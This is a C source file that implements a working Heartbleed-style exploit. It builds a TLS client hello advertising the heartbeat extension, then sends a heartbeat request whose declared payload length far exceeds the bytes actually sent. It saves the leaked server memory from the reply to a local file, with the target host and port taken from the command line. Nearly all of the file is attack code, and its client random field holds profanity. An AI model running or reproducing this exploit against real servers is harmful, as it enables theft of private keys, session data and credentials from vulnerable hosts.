#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <stdint.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>

void wait_server_helo_done(int s);
int write_down(char *src, int len, char *fname);
int connect_target(const char *name, const char *port);

/* TYPES: */
struct helo_message {
  uint8_t handshake_type;
  uint8_t length[3];
  /* anything more? */
} __attribute__ ((packed));

struct ext_hb {
  uint16_t type;
  uint16_t length;
  uint8_t  mode;
} __attribute__ ((packed));

struct helo_message_client {
  struct helo_message helo_message;
  uint16_t version;
  uint32_t timestamp;
  uint8_t random[28];
  uint8_t sessid_length;
  uint16_t cipher_suites;
  uint16_t ciphers[16];
  uint8_t compression_method_cnt;
  uint8_t compression_methods[1];
  uint16_t extensions_length;
  struct ext_hb extension_hb;
} __attribute__ ((packed));

struct heartbeat_message {
  uint8_t type;
  uint16_t length;
  uint8_t payload[2];
  uint8_t padding[16];
}  __attribute__ ((packed));


struct tls_generic_message {
  uint8_t content_type;
  uint16_t version;
  uint16_t length;
} __attribute__ ((packed));


struct tls_received_message {
  struct tls_generic_message message;
  uint8_t payload[0x4000 - sizeof(struct tls_generic_message)];
};

struct tls_message_helo_client {
  struct tls_generic_message message;
  struct helo_message_client payload;
} __attribute__ ((packed));

struct tls_message_heartbeat {
  struct tls_generic_message message;
  struct heartbeat_message payload;
} __attribute__ ((packed));

/* TYPES END */



int main(int argc, char **argv)
{
/* DATA: */  
  char *name = "127.0.0.1";
  char *port = "https";

  struct tls_message_helo_client client_hlo = {
    .message = {
      22,     /* handshake message*/
      0x0103, /* protocol version 3.1 */
      htons(sizeof(struct helo_message_client)),
    },
    .payload = {
      .helo_message = {
	.handshake_type = 1, /* Client helo */
	.length = {0,0, sizeof(struct helo_message_client) - sizeof(struct helo_message)},
      },
      .version = 0x0103,   /* TLS 1.0 */
      .timestamp = 0x69624553,
      .random = "Fuck you asshole! Fuck you!",
      .sessid_length = 0,
      .cipher_suites = 0x2000, /* 0x0020 in network order */
      .ciphers = {0x14c0,0x0ac0,0x22c0,0x21c0,0x3900,0x3800,0x8800,0x8700,0x0fc0,0x05c0,0x3500,0x8400,0x12c0,0x08c0,0x1cc0,0x1bc0},
      .compression_method_cnt = 1,
      .compression_methods = {0},
      .extensions_length = 0x0500,
      .extension_hb = {0x0f00, 0x0100, 1}
    }
  };

  struct tls_message_heartbeat hb = {
    .message = {
      .content_type = 24,     /* heartbeat message */
      .version = 0x0103, /* protocol version 3.1 */
      .length = htons(sizeof(struct heartbeat_message))
    },
    .payload = {
      1,
      htons(0x4000 - sizeof(struct heartbeat_message))
    }
  };
  /* DATA END. */

  if (argc > 1)
    name = argv[1];

  if (argc > 2)
    port = argv[2];

  int s = connect_target(name, port);

  int bt = write(s, &client_hlo, sizeof(client_hlo));
  printf("Client helo: sent %d bytes\n", bt);

  wait_server_helo_done(s);

  bt = write(s, &hb, sizeof(hb));
  printf("Client heartbeat: sent %d bytes\n", bt);

  /* Now we need to read heartbeat answer of len bytes. */
  unsigned char buf[65535];
  bt = recv(s, buf, sizeof(buf), 0);
  if (-1 == bt) {
    printf("Cannot read: %s\n", strerror(errno));
    exit(5);
  }
  if (0 == bt) {
    printf("Server closed connection\n");
    exit(5);
  }


  printf("%d bytes received from host\n", bt);

  write_down(buf, bt, "data_dump.bin");

  return 0;

}




int connect_target(const char *name, const char *port)
{
  int s = socket(AF_INET, SOCK_STREAM, 0);

  if (-1 == s) {
    printf("Cannot create socket.\n");
    exit(1);
  }

  struct addrinfo hints = {0};
  hints.ai_family = AF_INET;
  hints.ai_socktype = SOCK_STREAM;
  
  struct addrinfo *endpoint;
  int result = getaddrinfo(name, port, &hints, &endpoint);

  if (result) {
    printf("Cannot reoslve address: %s:%s: %s\n", name, port, gai_strerror(result));
    exit(1);
  }
  
  do {

    struct sockaddr_in *a = (struct sockaddr_in *)endpoint->ai_addr;

    printf("trying to connect: %s\n", inet_ntoa(a->sin_addr));
    result = connect(s, endpoint->ai_addr, endpoint->ai_addrlen);

    if (!result) {
      printf("Connected to: %s:%s (%s:%d)\n",
	     name,
	     port,
	     inet_ntoa(a->sin_addr),
	     ntohs(a->sin_port));
      return s;
    }

    printf("Cannot connect to %s: %s\n", inet_ntoa(a->sin_addr), strerror(errno));
    endpoint = endpoint->ai_next;
    
  } while(endpoint);

  close(s);
  
  exit(1);
}

int write_down(char *src, int len, char *fname)
{
  int fd = open(fname, O_RDWR|O_TRUNC|O_CREAT, S_IRUSR|S_IWUSR);

  if (-1 == fd) {
    printf("Cannot open %s: %s\n", fname, strerror(errno));
    exit(5);
  }

  int bt = write(fd, src, len);

  if (-1 == bt) {
    printf("Cannot write to %s: %s\n", fname, strerror(errno));
    exit(5);
  }

  close(fd);

  printf("%d bytes written into %s\n", bt, fname);
  
}


int read_message(int s, struct tls_received_message *p_msg)
{
  int bt = read(s, p_msg, sizeof(struct tls_generic_message));
  if (-1 == bt) {
    printf("Cannot read message: %s\n", strerror(errno));
    exit(5);
  }
  if (0 == bt) {
    printf("Server closed connection\n");
    exit(5);
  }

  printf("Message received (%d bytes): message type: %d; ",
	 bt, p_msg->message.content_type);

  if (22 != p_msg->message.content_type)
    return 0;
  
  int length = ntohs(p_msg->message.length);
  if (sizeof(p_msg->payload) < length)
    length = sizeof(p_msg->payload);
    
  printf("Message payload is %d bytes (%d)\n", length, ntohs(p_msg->message.length));
  bt = 0;
  while (bt < length) {
    int readed = read(s, (uint8_t *)&p_msg->payload + bt, length - bt);
    if (-1 == readed) {
      printf("Cannot read: %s\n", strerror(errno));
      break;
    }
    if (0 == readed) {
      printf("Server closed connection\n");
      break;
    }
    
    bt += readed;
  }
  
  return bt;

}

void wait_server_helo_done(int s)
{
  struct tls_received_message msg;
  struct helo_message *hlo_msg = (struct helo_message *)&msg.payload;
  int bt;
  do {
    bt = read_message(s, &msg);
    if (bt)
      printf("Payload of %d bytes: handshake type: %d\n", bt, hlo_msg->handshake_type);
    if (ntohs(msg.message.length) > bt) {
      printf("Only %d of %d message bytes received. Aborting.\n", bt, ntohs(msg.message.length));
      break;
    }
    if (hlo_msg->handshake_type == 14)
      return;
  } while (msg.message.content_type == 22 && hlo_msg->handshake_type != 14);

  exit(5);
}
